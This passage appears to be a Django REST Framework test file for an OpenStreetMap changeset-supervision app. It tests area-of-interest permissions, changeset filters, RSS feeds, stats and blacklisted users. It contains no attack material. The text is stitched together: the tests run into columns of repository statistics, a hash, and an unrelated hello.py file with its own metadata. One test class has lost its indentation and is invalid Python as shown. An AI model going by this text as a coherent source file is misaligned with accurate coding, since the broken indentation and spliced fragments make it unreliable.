            username='test',
            email='c@a.com',
            password='password'
            )
        UserSocialAuth.objects.create(
            user=user_2,
            provider='openstreetmap',
            uid='4444',
            )
        self.client.login(username=self.user.username, password='password')
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 201)
        aoi = AreaOfInterest.objects.get(name='Golfo da Guiné')
        self.assertEqual(aoi.user, self.user)
class TestAoIDetailAPIViews(APITestCase):
    """Tests for the AoI detail endpoint ('supervise:aoi-detail'):
    retrieve, update (PUT/PATCH) and delete, including permission checks."""

    def setUp(self):
        self.m_polygon = MultiPolygon(
            Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
            Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
            )
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
            )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
            )
        # The AoI under test, owned by self.user.
        self.aoi = AreaOfInterest.objects.create(
            name='Best place in the world',
            user=self.user,
            geometry=self.m_polygon,
            filters={
                'editor': 'Potlatch 2',
                'harmful': 'False',
                'users': 'test',
                'uids': '234,43',
                'checked_by': 'qa_user',
                'geometry': self.m_polygon.geojson
                },
            )
        self.m_polygon_2 = MultiPolygon(
            Polygon([[2, 0], [5, 0], [5, 2], [2, 2], [2, 0]])
            )
        # Update payload used by the PUT/PATCH tests below.
        self.data = {
            'filters': {
                'is_suspect': 'True',
                'geometry': self.m_polygon_2.geojson,
                },
            'name': 'Golfo da Guiné'
            }

    def test_unauthenticated(self):
        # Anonymous GET gets 401.
        response = self.client.get(
            reverse('supervise:aoi-detail', args=[self.aoi.pk])
            )
        self.assertEqual(response.status_code, 401)

    def test_retrieve_detail_authenticated(self):
        # The owner gets the AoI as a GeoJSON feature with name, filters,
        # geometry, an 'id' (but no 'user') and a changesets_url link.
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(
            reverse('supervise:aoi-detail', args=[self.aoi.pk])
            )
        self.assertEqual(response.status_code, 200)
        self.assertEqual(
            response.data['properties']['name'],
            'Best place in the world'
            )
        self.assertEqual(
            response.data['properties']['filters'],
            {
                'editor': 'Potlatch 2',
                'harmful': 'False',
                'users': 'test',
                'uids': '234,43',
                'checked_by': 'qa_user',
                'geometry': self.m_polygon.geojson
                }
            )
        self.assertEqual(
            response.data['geometry']['type'],
            'MultiPolygon'
            )
        self.assertIn(
            'id',
            response.data.keys()
            )
        self.assertNotIn(
            'user',
            response.data.keys()
            )
        self.assertEqual(
            response.data['properties']['changesets_url'],
            reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
            )

    def test_update_aoi_unauthenticated(self):
        """Unauthenticated users can not update AoI"""
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 401)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Best place in the world')
        response = self.client.patch(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 401)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Best place in the world')

    def test_delete_aoi_unauthenticated(self):
        """Unauthenticated users can not delete AoI"""
        response = self.client.delete(
            reverse('supervise:aoi-detail', args=[self.aoi.pk])
            )
        self.assertEqual(response.status_code, 401)
        self.assertEqual(AreaOfInterest.objects.count(), 1)

    def test_update_aoi_of_another_user(self):
        """A user can not update AoI of another user."""
        user = User.objects.create_user(
            username='test_2',
            email='c@a.com',
            password='password'
            )
        self.client.login(username=user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 403)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Best place in the world')
        response = self.client.patch(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 403)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Best place in the world')

    def test_delete_aoi_of_another_user(self):
        """A user can not delete AoI of another user."""
        user = User.objects.create_user(
            username='test_2',
            email='c@a.com',
            password='password'
            )
        self.client.login(username=user.username, password='password')
        response = self.client.delete(
            reverse('supervise:aoi-detail', args=[self.aoi.pk])
            )
        self.assertEqual(response.status_code, 403)
        self.assertEqual(AreaOfInterest.objects.count(), 1)

    def test_update_with_aoi_owner_user(self):
        """User can update his/her AoI"""
        self.client.login(username=self.user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Golfo da Guiné')
        self.assertEqual(self.aoi.filters, self.data.get('filters'))
        self.assertTrue(
            self.aoi.geometry.intersects(
                Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
                )
            )

    def test_put_update_with_bbox(self):
        """'in_bbox' field must populate the geometry field with a Polygon"""
        data = {
            'filters': {
                'is_suspect': 'True',
                'in_bbox': '4,0,5,1'
                },
            'name': 'Golfo da Guiné'
            }
        self.client.login(username=self.user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Golfo da Guiné')
        self.assertEqual(self.aoi.filters, data.get('filters'))
        self.assertTrue(
            self.aoi.geometry.intersects(
                Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
                )
            )
        self.assertIsInstance(self.aoi.geometry, Polygon)

    def test_put_empty_geometry(self):
        """If the AoI receives a filter without geometry and in_bbox information,
        the geometry field will be updated to None."""
        data = {
            'filters': {
                'is_suspect': 'True',
                },
            'name': 'Golfo da Guiné'
            }
        self.client.login(username=self.user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Golfo da Guiné')
        self.assertEqual(self.aoi.filters, data.get('filters'))
        self.assertIsNone(self.aoi.geometry)

    def test_patch_empty_geometry(self):
        """If the AoI receives a filter without geometry and in_bbox information,
        the geometry field will be updated to None."""
        data = {
            'filters': {
                'is_suspect': 'True',
                },
            'name': 'Golfo da Guiné'
            }
        self.client.login(username=self.user.username, password='password')
        response = self.client.patch(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.name, 'Golfo da Guiné')
        self.assertEqual(self.aoi.filters, data.get('filters'))
        self.assertIsNone(self.aoi.geometry)

    def test_patch_update_with_bbox(self):
        """'in_bbox' field must populate the geometry field with a Polygon"""
        data = {
            'filters': {
                'is_suspect': 'True',
                'in_bbox': '4,0,5,1'
                }
            }
        self.client.login(username=self.user.username, password='password')
        response = self.client.patch(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertEqual(self.aoi.filters, data.get('filters'))
        self.assertIsInstance(self.aoi.geometry, Polygon)
        self.assertTrue(
            self.aoi.geometry.intersects(
                Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
                )
            )

    def test_update_with_line_and_point(self):
        """The geometry field must receive any geometry type."""
        # Point geometry.
        point = Point((0.5, 0.5))
        data = {
            'filters': {
                'geometry': point.geojson,
                },
            'name': 'Golfo da Guiné'
            }
        self.client.login(username=self.user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertIsInstance(self.aoi.geometry, Point)
        # LineString geometry.
        line = LineString(((0.5, 0.5), (1, 1)))
        data = {
            'filters': {
                'geometry': line.geojson,
                },
            'name': 'Golfo da Guiné'
            }
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            data
            )
        self.assertEqual(response.status_code, 200)
        self.aoi.refresh_from_db()
        self.assertIsInstance(self.aoi.geometry, LineString)

    def test_validation(self):
        self.client.login(username=self.user.username, password='password')
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            self.data
            )
        self.assertEqual(response.status_code, 200)
        # validate if the user are not allowed to let the filters and geometry fields empty
        response = self.client.put(
            reverse('supervise:aoi-detail', args=[self.aoi.pk]),
            {'name': 'Golfo da Guiné'}
            )
        self.assertEqual(response.status_code, 400)
        self.aoi.refresh_from_db()
        self.assertIsNotNone(self.aoi.filters)
        self.assertIsNotNone(self.aoi.geometry)

    def test_delete_with_aoi_owner_user(self):
        # The owner can delete their AoI.
        self.client.login(username=self.user.username, password='password')
        response = self.client.delete(
            reverse('supervise:aoi-detail', args=[self.aoi.pk])
            )
        self.assertEqual(response.status_code, 204)
        self.assertEqual(AreaOfInterest.objects.count(), 0)
class TestAoIChangesetListView(APITestCase):
def setUp(self):
self.m_polygon = MultiPolygon(
Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
)
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.aoi = AreaOfInterest.objects.create(
name='Best place in the world',
user=self.user,
geometry=self.m_polygon,
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'geometry': self.m_polygon.geojson
},
)
def test_authenticated_aoi_list_changesets_view(self):
ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
ChangesetFactory(
editor='JOSM 1.5',
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 51)
self.assertEqual(len(response.data['features']), 50)
self.assertIn('features', response.data.keys())
self.assertIn('geometry', response.data['features'][0].keys())
self.assertIn('properties', response.data['features'][0].keys())
self.assertIn('check_user', response.data['features'][0]['properties'])
self.assertIn('user', response.data['features'][0]['properties'])
self.assertIn('uid', response.data['features'][0]['properties'])
def test_unauthenticated_aoi_list_changesets_view(self):
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 401)
def test_aoi_with_in_bbox_filter(self):
aoi_with_in_bbox = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
geometry=Polygon(((0, 0), (0, 2), (2, 2), (2, 0), (0, 0))),
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'in_bbox': '0,0,2,2'
},
)
ChangesetFactory(
harmful=False,
bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10)))
)
ChangesetFactory(
editor='JOSM 1.5',
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((10, 10), (10, 10.5), (10.7, 10.5), (10, 10))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi_with_in_bbox.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 51)
self.assertEqual(len(response.data['features']), 50)
def test_aoi_with_hide_whitelist_filter(self):
    """'hide_whitelist': 'True' excludes changesets by whitelisted users."""
    aoi = AreaOfInterest.objects.create(
        name='Another place in the world',
        user=self.user,
        filters={
            'editor': 'Potlatch 2',
            'hide_whitelist': 'True'
        },
    )
    UserWhitelistFactory(user=self.user, whitelist_user='test')
    # Three changesets; count of 2 below implies the default-factory
    # changeset belongs to the whitelisted user 'test' — TODO confirm
    # against ChangesetFactory's defaults.
    ChangesetFactory()
    ChangesetFactory(user='other_user', uid='333')
    ChangesetFactory(user='another_user', uid='4333')
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-list-changesets', args=[aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.data['count'], 2)
    self.assertEqual(len(response.data['features']), 2)
def test_aoi_with_false_hide_whitelist_filter(self):
    """'hide_whitelist': 'False' leaves whitelisted users' changesets visible."""
    aoi = AreaOfInterest.objects.create(
        name='Another place in the world',
        user=self.user,
        filters={
            'editor': 'Potlatch 2',
            'hide_whitelist': 'False'
        },
    )
    UserWhitelistFactory(user=self.user, whitelist_user='test')
    ChangesetFactory()
    ChangesetFactory(user='other_user', uid='333')
    ChangesetFactory(user='another_user', uid='4333')
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-list-changesets', args=[aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    # All three changesets are listed; the whitelist is not applied.
    self.assertEqual(response.data['count'], 3)
    self.assertEqual(len(response.data['features']), 3)
def test_aoi_with_blacklist_filter(self):
    """'blacklist': 'True' restricts the list to blacklisted users' changesets."""
    aoi = AreaOfInterest.objects.create(
        name='Another place in the world',
        user=self.user,
        filters={
            'editor': 'Potlatch 2',
            'blacklist': 'True'
        },
    )
    BlacklistedUser.objects.create(
        username='test',
        uid='123123',
        added_by=self.user,
    )
    # Count of 1 below implies only the default-factory changeset matches
    # the blacklisted user 'test' — TODO confirm factory defaults.
    ChangesetFactory()
    ChangesetFactory(user='other_user', uid='333')
    ChangesetFactory(user='another_user', uid='4333')
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-list-changesets', args=[aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.data['count'], 1)
    self.assertEqual(len(response.data['features']), 1)
def test_aoi_with_false_blacklist_filter(self):
    """'blacklist': 'False' must not restrict the list to blacklisted users."""
    aoi = AreaOfInterest.objects.create(
        name='Another place in the world',
        user=self.user,
        filters={
            'editor': 'Potlatch 2',
            'blacklist': 'False'
        },
    )
    BlacklistedUser.objects.create(
        username='test',
        uid='123123',
        added_by=self.user,
    )
    ChangesetFactory()
    ChangesetFactory(user='other_user', uid='333')
    ChangesetFactory(user='another_user', uid='4333')
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-list-changesets', args=[aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    # All three changesets are listed; the blacklist is not applied.
    self.assertEqual(response.data['count'], 3)
    self.assertEqual(len(response.data['features']), 3)
def test_aoi_changesets_feed_view(self):
    """The AoI RSS feed is titled after the AoI and caps items at 50.

    Also exercises non-ASCII user names in the feed body.
    """
    ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
    ChangesetFactory(
        editor='JOSM 1.5',
        harmful=False,
        bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
    )
    GoodChangesetFactory.create_batch(
        51,
        comment='Test case',
        user='çãoéí',
        bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
    )
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-changesets-feed', args=[self.aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    # Element.getchildren() was deprecated and removed in Python 3.9;
    # iterate the <channel> element (first child of <rss>) directly.
    rss_data = list(ET.fromstring(response.content)[0])
    title = [i for i in rss_data if i.tag == 'title'][0]
    items = [i for i in rss_data if i.tag == 'item']
    self.assertEqual(
        title.text,
        'Changesets of Area of Interest {} by {}'.format(
            self.aoi.name, self.aoi.user.username
        )
    )
    self.assertEqual(len(items), 50)
def test_feed_view_of_unnamed_aoi_and_zero_changesets(self):
    """A nameless AoI's feed falls back to the 'Unnamed' title."""
    ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
    HarmfulChangesetFactory(
        editor='JOSM 1.5',
        bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
    )
    self.aoi.name = ''
    self.aoi.filters = {
        'editor': 'JOSM 1.5',
        'harmful': 'True',
        'in_bbox': '0,0,2,2'
    }
    self.aoi.save()
    self.client.login(username=self.user.username, password='password')
    response = self.client.get(
        reverse('supervise:aoi-changesets-feed', args=[self.aoi.pk])
    )
    self.assertEqual(response.status_code, 200)
    # Element.getchildren() was deprecated and removed in Python 3.9;
    # iterate the <channel> element (first child of <rss>) directly.
    rss_data = list(ET.fromstring(response.content)[0])
    title = [i for i in rss_data if i.tag == 'title'][0]
    items = [i for i in rss_data if i.tag == 'item']
    self.assertEqual(
        title.text,
        'Changesets of Area of Interest Unnamed by {}'.format(
            self.aoi.user.username
        )
    )
    self.assertEqual(len(items), 1)
class TestAoIStatsAPIViews(APITestCase):
    """Tests for the AoI stats endpoint (supervise:aoi-stats)."""

    def setUp(self):
        # Two-triangle MultiPolygon used both as the AoI geometry and as
        # the value of the 'geometry' filter.
        self.m_polygon = MultiPolygon(
            Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
            Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
        )
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password',
            is_staff=True
        )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
        )
        self.aoi = AreaOfInterest.objects.create(
            name='Best place in the world',
            user=self.user,
            geometry=self.m_polygon,
            filters={
                'editor': 'Potlatch 2',
                'harmful': 'False',
                'geometry': self.m_polygon.geojson
            },
        )
        # One changeset outside the AoI geometry and one harmful changeset
        # inside it; the stats tests expect checked_changesets == 51, i.e.
        # the 51 good changesets created below.
        ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
        HarmfulChangesetFactory(
            editor='JOSM 1.5',
            bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
        )
        self.good_changesets = GoodChangesetFactory.create_batch(
            51,
            bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
        )
        # One visible and one hidden reason/tag, each on 5 changesets, so
        # the tests can check visibility filtering by user role.
        self.reason = SuspicionReasonsFactory(name='possible import')
        self.reason_2 = SuspicionReasonsFactory(
            name='Mass Deletion', is_visible=False)
        self.reason.changesets.set(self.good_changesets[0:5])
        self.reason_2.changesets.set(self.good_changesets[5:10])
        self.tag_1 = TagFactory(name='Vandalism')
        self.tag_2 = TagFactory(name='Big buildings', is_visible=False)
        self.tag_1.changesets.set(self.good_changesets[0:5])
        self.tag_2.changesets.set(self.good_changesets[5:10])
        self.url = reverse('supervise:aoi-stats', args=[self.aoi.pk])

    def test_stats_unauthenticated(self):
        """Anonymous users get stats but only the visible reason/tag."""
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data.get('checked_changesets'), 51)
        self.assertEqual(response.data.get('harmful_changesets'), 0)
        self.assertEqual(response.data.get('users_with_harmful_changesets'), 0)
        self.assertEqual(len(response.data.get('reasons')), 1)
        self.assertEqual(len(response.data.get('tags')), 1)
        possible_import = {
            'name': 'possible import',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(possible_import, response.data.get('reasons'))
        vandalism = {
            'name': 'Vandalism',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(vandalism, response.data.get('tags'))

    def test_stats_with_staff_user(self):
        """Staff users additionally see the non-visible reason and tag."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data.get('checked_changesets'), 51)
        self.assertEqual(response.data.get('harmful_changesets'), 0)
        self.assertEqual(response.data.get('users_with_harmful_changesets'), 0)
        self.assertEqual(len(response.data.get('reasons')), 2)
        self.assertEqual(len(response.data.get('tags')), 2)
        possible_import = {
            'name': 'possible import',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(possible_import, response.data.get('reasons'))
        vandalism = {
            'name': 'Vandalism',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(vandalism, response.data.get('tags'))
        mass_deletion = {
            'name': 'Mass Deletion',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(mass_deletion, response.data.get('reasons'))
        big_buildings = {
            'name': 'Big buildings',
            'changesets': 5,
            'checked_changesets': 5,
            'harmful_changesets': 0
        }
        self.assertIn(big_buildings, response.data.get('tags'))
class TestBlacklistedUserListAPIView(APITestCase):
    """Tests for the blacklist list endpoint (supervise:blacklist-list-create).

    The list results are scoped to entries added by the requesting user:
    the staff user sees its 2 entries, the normal user sees its 1.
    """

    def setUp(self):
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
        )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
        )
        self.staff_user = User.objects.create_user(
            username='staff_user',
            email='b@a.com',
            password='password',
            is_staff=True
        )
        UserSocialAuth.objects.create(
            user=self.staff_user,
            provider='openstreetmap',
            uid='999898',
        )
        # Two entries added by the staff user, one by the normal user.
        BlacklistedUser.objects.create(
            username='Bad User',
            uid='3434',
            added_by=self.staff_user,
        )
        BlacklistedUser.objects.create(
            username='Vandal',
            uid='3435',
            added_by=self.staff_user,
        )
        BlacklistedUser.objects.create(
            username='New bad user',
            uid='9888',
            added_by=self.user,
        )
        self.url = reverse('supervise:blacklist-list-create')

    def test_list_view_unauthenticated(self):
        """Anonymous access is rejected with 401."""
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 401)

    def test_list_view_normal_user(self):
        """A normal user lists only the entry they added themselves."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data.get('results')), 1)

    def test_list_view_staff_user(self):
        """A staff user lists the two entries they added."""
        self.client.login(username=self.staff_user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(len(response.data.get('results')), 2)
class TestBlacklistedUserCreateAPIView(APITestCase):
    """Tests for creating blacklist entries via POST on the list endpoint.

    Any authenticated user (staff or not) may create an entry; anonymous
    requests are rejected.
    """

    def setUp(self):
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
        )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
        )
        self.staff_user = User.objects.create_user(
            username='staff_user',
            email='b@a.com',
            password='password',
            is_staff=True
        )
        UserSocialAuth.objects.create(
            user=self.staff_user,
            provider='openstreetmap',
            uid='999898',
        )
        self.url = reverse('supervise:blacklist-list-create')
        # Payload reused by every test below.
        self.data = {'username': 'Bad User', 'uid': '3434'}

    def test_create_view_unauthenticated(self):
        """Anonymous POST gets 401 and creates nothing."""
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 401)
        self.assertEqual(BlacklistedUser.objects.count(), 0)

    def test_create_view_normal_user(self):
        """A normal authenticated user can create a blacklist entry."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 201)
        self.assertEqual(BlacklistedUser.objects.count(), 1)

    def test_create_view_staff_user(self):
        """A staff user can create a blacklist entry."""
        self.client.login(username=self.staff_user.username, password='password')
        response = self.client.post(self.url, self.data)
        self.assertEqual(response.status_code, 201)
        self.assertEqual(BlacklistedUser.objects.count(), 1)
class TestBlacklistedUserDetailAPIViews(APITestCase):
    """Tests for GET/PATCH/DELETE on supervise:blacklist-detail.

    Two entries share the same username and uid but have different
    ``added_by`` owners; the detail view resolves the entry owned by the
    requesting user (a normal user gets 404 for a staff-owned uid).
    """

    def setUp(self):
        self.user = User.objects.create_user(
            username='test_user',
            email='b@a.com',
            password='password'
        )
        UserSocialAuth.objects.create(
            user=self.user,
            provider='openstreetmap',
            uid='123123',
        )
        self.staff_user = User.objects.create_user(
            username='staff_user',
            email='b@a.com',
            password='password',
            is_staff=True
        )
        UserSocialAuth.objects.create(
            user=self.staff_user,
            provider='openstreetmap',
            uid='999898',
        )
        # Same blacklisted username/uid added by two different users.
        self.blacklisted = BlacklistedUser.objects.create(
            username='Bad User',
            uid='3434',
            added_by=self.staff_user,
        )
        self.blacklisted_2 = BlacklistedUser.objects.create(
            username='Bad User',
            uid='3434',
            added_by=self.user,
        )
        self.url = reverse(
            'supervise:blacklist-detail', args=[self.blacklisted.uid]
        )

    def test_unauthenticated_get(self):
        """Anonymous GET is rejected with 401."""
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 401)

    def test_normal_user_get(self):
        """A normal user retrieves the entry they added (added_by == test_user)."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data.get('username'), 'Bad User')
        self.assertEqual(response.data.get('added_by'), 'test_user')
        self.assertIsNotNone(response.data.get('uid'))
        self.assertIn('date', response.data.keys())

    def test_normal_user_getting_staff_user_blacklist(self):
        """A normal user must get 404 for an entry added by another user."""
        # Created only so a staff-owned entry with uid 4999 exists; the
        # local name is otherwise unused.
        blacklisted = BlacklistedUser.objects.create(
            username='Bad User',
            uid='4999',
            added_by=self.staff_user,
        )
        self.client.login(username=self.user.username, password='password')
        response = self.client.get(
            reverse('supervise:blacklist-detail', args=[4999])
        )
        self.assertEqual(response.status_code, 404)

    def test_staff_user_get(self):
        """The staff user retrieves the entry they added themselves."""
        self.client.login(username=self.staff_user.username, password='password')
        response = self.client.get(self.url)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data.get('username'), 'Bad User')
        self.assertEqual(response.data.get('added_by'), 'staff_user')
        self.assertIsNotNone(response.data.get('uid'))
        self.assertIn('date', response.data.keys())

    def test_unauthenticated_delete(self):
        """Anonymous DELETE is rejected and removes nothing."""
        response = self.client.delete(self.url)
        self.assertEqual(response.status_code, 401)
        self.assertEqual(BlacklistedUser.objects.count(), 2)

    def test_normal_user_delete(self):
        """A normal user deletes their own entry only (one of two remains)."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.delete(self.url)
        self.assertEqual(response.status_code, 204)
        self.assertEqual(BlacklistedUser.objects.count(), 1)

    def test_staff_user_delete(self):
        """The staff user deletes their own entry only (one of two remains)."""
        self.client.login(username=self.staff_user.username, password='password')
        response = self.client.delete(self.url)
        self.assertEqual(response.status_code, 204)
        self.assertEqual(BlacklistedUser.objects.count(), 1)

    def test_unauthenticated_patch(self):
        """Anonymous PATCH is rejected and changes nothing."""
        response = self.client.patch(self.url, {'username': 'other_user'})
        self.assertEqual(response.status_code, 401)
        self.assertEqual(self.blacklisted.username, 'Bad User')

    def test_normal_user_patch(self):
        """A normal user's PATCH updates their own entry (blacklisted_2)."""
        self.client.login(username=self.user.username, password='password')
        response = self.client.patch(self.url, {'username': 'other_user'})
        self.assertEqual(response.status_code, 200)
        self.blacklisted_2.refresh_from_db()
        self.assertEqual(self.blacklisted_2.username, 'other_user')

    def test_staff_user_patch(self):
        """The staff user's PATCH updates the staff-owned entry."""
        self.client.login(username=self.staff_user.username, password='password')
        response = self.client.patch(self.url, {'username': 'other_user'})
        self.assertEqual(response.status_code, 200)
        self.blacklisted.refresh_from_db()
        self.assertEqual(self.blacklisted.username, 'other_user')
| 37.854969
| 91
| 0.56733
| 4,552
| 42,284
| 5.164763
| 0.056678
| 0.08741
| 0.080221
| 0.070311
| 0.87533
| 0.848533
| 0.823139
| 0.797788
| 0.773628
| 0.746576
| 0
| 0.029542
| 0.299522
| 42,284
| 1,116
| 92
| 37.888889
| 0.764205
| 0.019771
| 0
| 0.644269
| 0
| 0
| 0.120311
| 0.012374
| 0
| 0
| 0
| 0
| 0.167984
| 1
| 0.0583
| false
| 0.05336
| 0.01581
| 0
| 0.082016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
f7f4535f06fc137c900ae9eaa837bf15c073f00e
| 49
|
py
|
Python
|
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
def hello_name(name):
    """Return the greeting 'Hello <name>' for the given *name*."""
    return 'Hello {}'.format(name)
| 16.333333
| 26
| 0.673469
| 8
| 49
| 4
| 0.625
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183673
| 49
| 2
| 27
| 24.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
